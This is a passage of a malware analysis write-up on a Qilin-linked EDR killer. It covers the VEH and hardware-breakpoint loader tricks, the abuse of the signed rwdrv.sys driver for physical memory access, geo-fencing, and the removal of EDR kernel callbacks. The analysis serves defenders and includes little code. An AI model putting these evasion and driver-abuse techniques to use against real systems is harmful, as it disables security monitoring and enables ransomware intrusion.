functions.</span></figcaption></figure><p>After several decoding and preparation steps, the PE image is decompressed from memory.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image24.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1034" height="284" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image24.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image24.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image24.png 1034w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 23. Compressed buffer, previously unpacked.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image25.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="994" height="234" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image25.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image25.png 994w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 24. Decompressed buffer.</span></figcaption></figure><p>After the PE image has been decompressed, the final routine responsible for preparing, loading, and ultimately executing the PE can be found at 0x24A2CE7 in this run.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image26.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="634" height="103" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image26.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image26.png 634w"><figcaption><span style="white-space: pre-wrap;">Figure 25. Final load and execution of the embedded PE.</span></figcaption></figure><p>The <code>fix_and_load_PE_set_VEH</code> function begins by mapping &#x201C;shell32.dll&#x201D; into the process address space using <code>NtCreateFile</code>, <code>NtCreateSection</code>, and <code>MapViewOfFile</code>. It then overwrites the in-memory contents of &#x201C;shell32.dll&#x201D; with the previously loaded PE image.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image27.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1504" height="1347" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image27.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image27.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image27.png 1504w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 26. Load &#x201C;shell32.dll&#x201D; into memory.</span></figcaption></figure><p>After copying the embedded and decoded PE image into memory, the code manually applies base relocations.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image28.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1108" height="564" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image28.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image28.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image28.png 1108w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 27. PE relocation.</span></figcaption></figure><p>After preparing the PE for in-memory execution, the loader employs a technique similar to Stage 2, but this time leveraging a vectored exception handler (VEH). After registering the VEH, it triggers the handler by setting a hardware breakpoint on <code>ntdll!NtOpenSection</code>. To indirectly invoke <code>NtOpenSection</code>, the loader subsequently loads a fake DLL via a call to the <code>LdrLoadDll</code> API. It appears that the malware author intentionally chose a name referencing a well-known security researcher, likely as a provocative touch.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image29.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1440" height="475" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image29.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image29.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image29.png 1440w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 28. Call to </span><code spellcheck="false" style="white-space: pre-wrap;"><span>LdrLoadDll</span></code><span style="white-space: pre-wrap;">.</span></figcaption></figure><p>After several intermediate steps, this results in a call to <code>NtOpenSection</code>, which triggers the previously configured hardware breakpoint and, in turn, invokes the VEH. The first time the VEH is triggered at <code>NtOpenSection</code>, it executes the code in Figure 29.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image30.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1320" height="852" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image30.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image30.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image30.png 1320w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 29. Malicious VEH, part 1: </span><code spellcheck="false" style="white-space: pre-wrap;"><span>NtOpenSection</span></code><span style="white-space: pre-wrap;"> handler.</span></figcaption></figure><p>It modifies the &#x201C;shell32.dll&#x201D; name in memory to &#x201C;hasherezade_[redacted].dll&#x201D;, then adjusts RIP in the context record to point to the next <code>ret</code> instruction (0xC3) within the <code>NtOpenSection</code> stub and sets a new hardware breakpoint on <code>NtMapViewOfSection</code>. In addition, it updates the stack pointer to reference <code>LdrpMinimalMapModule+offset</code>, where the offset corresponds to an instruction immediately following a call to <code>NtOpenSection</code> inside <code>LdrpMinimalMapModule</code>. It then invokes <code>NtContinue</code>, which resumes execution at the RIP value stored in the context record (i.e., at the <code>ret</code> instruction). That <code>ret</code> instruction subsequently transfers control to the address prepared on the stack, namely <code>LdrpMinimalMapModule+offset</code>.</p><p><code>cr_1-&gt;rsp = LdrpMinimalMapModule+offset<br>cr_1-&gt;rip = ntdll!NtOpenSection+0x14 = ret ; jumps to &lt;rsp&gt; when executed</code></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image31.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1072" height="81" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image31.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image31.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image31.png 1072w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 30. Jump destination after calling </span><code spellcheck="false" style="white-space: pre-wrap;"><span>NtOpenSection</span></code><span style="white-space: pre-wrap;">.</span></figcaption></figure><p>During execution of <code>LdrpMinimalMapModule</code>, a call to <code>NtMapViewOfSection</code> is made, which triggers the hardware breakpoint set by the previous routine. On this occasion, the VEH executes the code in Figure 31.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image32.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1204" height="1347" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image32.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image32.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image32.png 1204w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 31. Malicious VEH, part 2: </span><code spellcheck="false" style="white-space: pre-wrap;"><span>NtMapViewOfSection</span></code><span style="white-space: pre-wrap;"> handler.</span></figcaption></figure><p>It deletes all HW breakpoints and then sets the stackpointer to an address which points to an address in <code>LdrMinimalMapModule+offset</code>. As expected, this is right after a call to <code>NtMapViewOfSection</code>. In other words, the registers in the context are overwritten like this:<br><br><code>ctx-&gt;rsp -&gt; ntdll!LdrpMinimalMapModule+0x23b<br>ctx-&gt;rip -&gt; ntdll!NtMapViewOfSection+0x14 = ret</code><br><br>When the return (ret) instruction is reached, it jumps to the address stored in the stack pointer (rsp).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image33.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1103" height="77" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image33.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image33.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image33.png 1103w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 32. Jump destination after </span><code spellcheck="false" style="white-space: pre-wrap;"><span>call NtMapViewOfSection</span></code><span style="white-space: pre-wrap;">.</span></figcaption></figure><p>The subsequent code in <code>LdrpMinimalMapModule</code> maps the previously restored PE image into the process address space and prepares it for execution. Finally, control returns to 0x24A3C1E, the instruction immediately following the call that originally triggered the first hardware breakpoint.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image34.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="2000" height="95" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image34.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image34.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image34.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image34.png 2020w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 33. Instruction after the call to </span><code spellcheck="false" style="white-space: pre-wrap;"><span>LdrLoadDll</span></code><span style="white-space: pre-wrap;">.</span></figcaption></figure><p>After several additional fix-up steps, the loader transfers execution to Stage 4 (i.e., the loaded PE image).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image35.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="962" height="95" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image35.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image35.png 962w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 34. Final jump to loaded PE.</span></figcaption></figure><p>This PE file is an EDR killer capable of disabling over 300 different EDR drivers across a wide range of solutions. A detailed analysis of this component will be provided in the next section.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image36.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1066" height="1325" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image36.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image36.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image36.png 1066w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 35. Excerpt from the EDR driver list.</span></figcaption></figure><h3 id="pe-loader-summary">PE loader summary</h3><p>The first three stages of this binary implement a sophisticated and complex PE loader capable of bypassing common EDR solutions by evading user-mode hooks through carefully crafted SEH and VEH techniques. While these methods are not entirely novel, they remain effective and should be detectable by properly implemented EDR solutions.</p><p>The loader decrypts and executes an embedded PE payload in memory. In this campaign, the payload is an EDR killer capable of disabling over 300 different EDR products. This component will be analyzed in detail in the next section.</p><h2 id="edr-killer">EDR killer</h2><h3 id="stage-4-extracted-edr-killer-pe-file">Stage 4: Extracted EDR killer PE file</h3><p>Besides initialization, the first thing the extracted PE from Stage 3 does is check again if the system locale matches a list of post-Soviet countries and, if it does, it crashes. This is another indicator that former stages are just a custom PE loader, which could be used to load any PE the adversaries want. Otherwise, doing the same check again is not logical.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image37.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="584" height="220"><figcaption><span style="white-space: pre-wrap;">Figure 36. Malware geo-fencing function.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image38.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="947" height="676" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image38.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image38.png 947w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 37. List of blocked countries.</span></figcaption></figure><p>The malware then attempts to elevate its privileges and load a helper driver. This also implies that the process must be executed with administrative privileges.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image39.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1599" height="1044" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image39.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image39.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image39.png 1599w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 38. Privilege escalation and loading of helper driver.</span></figcaption></figure><p>The &#x201C;rwdrv.sys&#x201D; driver is a renamed version of &#x201C;ThrottleStop.sys&#x201D;, originally distributed by TechPowerUp LLC and signed with a valid digital certificate. It is legitimately used by tools such as GPU-Z and ThrottleStop. This is not the first observed abuse of this ; it has previously been leveraged in several malware campaigns.</p><p>Despite its benign origin, the driver exposes highly powerful functionality and can be loaded by arbitrary user-mode applications. Critically, it implements these capabilities without enforcing meaningful security checks, making it particularly attractive for abuse.</p><p>This driver exposes a low-level hardware access interface to user mode via input/output controls (IOCTLs). It allows a user-mode application to directly interact with system hardware.</p><p>The driver implements IOCTL handlers that provide the following capabilities:</p><ul><li>I/O port access<ul><li>Read from hardware ports (inb/inw/ind)</li><li>Write to hardware ports (outb/outw/outd)</li></ul></li><li>CPU Model Specific Register (MSR) access<ul><li>Read MSRs (__readmsr)</li><li>Write MSRs (__writemsr) with limited protection against modifying critical syscall/sysenter registers</li></ul></li><li>Physical memory/MMIO access<ul><li>Map arbitrary physical memory into kernel space using MmMapIoSpace</li><li>Create a user-mode mapping of the same memory using MmMapLockedPagesSpecifyCache</li><li>Maintain up to 256 active mappings per driver instance</li><li>Provide an IOCTL to release/unmap those mappings</li></ul></li><li>Direct physical memory access<ul><li>Read physical memory values</li><li>Write physical memory values</li></ul></li><li>PCI configuration space access<ul><li>Read PCI configuration registers (HalGetBusDataByOffset)</li><li>Write PCI configuration registers (HalSetBusDataByOffset)</li></ul></li></ul><p>Additionally, the driver tracks the number of open handles and associates memory mappings with the calling process ID.</p><p>Overall, the driver functions as a generic kernel-mode hardware access layer, exposing primitives for port I/O, MSR access, physical memory mapping, and PCI configuration operations. Such functionality is typically used by hardware diagnostic tools, firmware utilities, or low-level system utilities, but it also provides powerful primitives that could be abused if accessible from unprivileged user-mode.</p><p>The two important functions heavily used by the sample are the ability to read and write physical memory.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image40.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1305" height="1087" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image40.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image40.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image40.png 1305w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 39. Read physical memory IOCTL.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image41.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1816" height="1223" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image41.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image41.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image41.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image41.png 1816w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 40. Write physical memory IOCTL.</span></figcaption></figure><p>After loading the driver, the malware proceeds to determine the Windows version. To do so, it first resolves the required API function using a PEB-based lookup routine, a technique consistently employed throughout the sample.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image42.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="984" height="965" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image42.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image42.png 984w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 41. DLL resolution.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image43.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1959" height="439" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image43.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image43.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image43.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image43.png 1959w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 42. API function resolution.</span></figcaption></figure><p>The implementation parses the Process Environment Block (PEB) and locates the target module by finding the hash of its name. Then the <code>ResolveExportByHash</code> function takes the module base from the previously found DLL and parses its PE header to find the function that corresponds to the function hash. It can either provide the API function address as an PE offset or as a virtual address.</p><p>After a couple of initializations and checks, it gets the &#x201C;rwdrv.sys&#x201D; handle, followed by the EDR-related part of the sample &#x2014; the kernel tricks which are responsible for avoiding, blinding, and disabling the EDR.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image44.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="2000" height="190" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image44.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image44.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image44.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image44.png 2082w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 43. Get driver handle for &#x201C;rwdrv.sys&#x201D;.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image45.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="2000" height="1166" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image45.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image45.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image45.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image45.png 2023w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 44. Overview of the EDR killer part of the sample.</span></figcaption></figure><p>However, let&#x2019;s have a brief look into the details. It starts with building a vector of physical memory pages. This vector will later be used in subsequent methods.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image46.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1883" height="372" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image46.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image46.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image46.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image46.png 1883w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 45. Initialization logic of the Page Frame Number (PFN) metadata list.</span></figcaption></figure><p>The <code>SetMemLayoutPointer </code>function in the if statement above leverages the <code>NtQuerySystemInformation</code> API function to gather the Superfetch information about the physical memory pages. It stores a pointer to this information in global variables (<code>mem_layout_v1_ptr</code> or <code>mem_layout_v2_ptr</code>). Which one is used depends on the version variable which is the argument handed over to the function. In our case, <code>1</code> is for calling the function the first time and <code>2</code> is for the second time. In other words, it brute-forces whichever version works for the Windows system it is running on.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image47-48-1.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="2000" height="613" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image47-48-1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image47-48-1.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image47-48-1.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/03/image47-48-1.png 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 46. Superfetch structure and </span><code spellcheck="false" style="white-space: pre-wrap;"><span>NtQuerySystemInformation</span></code><span style="white-space: pre-wrap;"> call.</span></figcaption></figure><p>The <code>BuildSuperfetchPfnMetadataList</code> function is quite large and complex. Simplified, it starts by using the <code>mem_layout</code> pointer to calculate the total page count.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image49.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1911" height="772" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image49.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image49.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image49.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image49.png 1911w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 47. Total Page count algorithm.</span></figcaption></figure><p>It then ends by using <code>NtQuerySystemInformation</code> again to get the physical pages and their meta data to store this information in a global vector (<code>g_PfnVector</code>).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image50.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1292" height="116" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image50.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image50.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image50.png 1292w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 48. Superfetch structure.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image51.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1882" height="868" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image51.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image51.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image51.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image51.png 1882w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 49. Build global physical memory list Vector.</span></figcaption></figure><p>Back to the block from the above, the next step blinds the EDRs by deleting their callbacks for certain operations (e.g., process creation, thread creation, and image loading events).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image52.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1403" height="249" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image52.png 600w, 